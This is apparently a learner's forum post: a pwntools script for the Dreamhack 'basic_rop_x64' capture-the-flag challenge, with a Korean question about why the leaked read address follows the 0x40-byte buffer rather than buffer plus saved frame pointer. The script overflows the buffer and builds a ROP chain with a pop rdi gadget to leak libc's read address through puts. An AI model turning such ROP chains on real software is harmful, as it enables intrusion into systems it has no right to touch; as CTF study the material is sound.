from pwn import *

context.log_level = ‘debug’

#p = remote(“host3.dreamhack.games”, 21826)
p = process(“./basic_rop_x64”)
e = ELF(“./basic_rop_x64”)
libc = ELF(“./libc.so.6”)

read_plt = e.plt[‘read’]
read_got = e.got[‘read’]
puts_plt = e.plt[‘puts’]
pop_rdi = 0x0000000000000a73

print(f"read_plt: {hex(read_plt)}“)
print(f"read_got: {hex(read_got)}”)
print(f"puts_plt: {hex(puts_plt)}")

payload = b’A’*0x40 + b’B’*0x8
payload += p64(pop_rdi)
payload += p64(read_got)
payload += p64(puts_plt)

p.send(payload)
p.recvuntil(“A”*0x40)
read = u64(p.recvn(6) + b"\x00"*2)

질문

왜 buf(0x40) + sfp(0x8)가 아닌 buf(0x40)을 넘겨야 read 함수 주소인가요?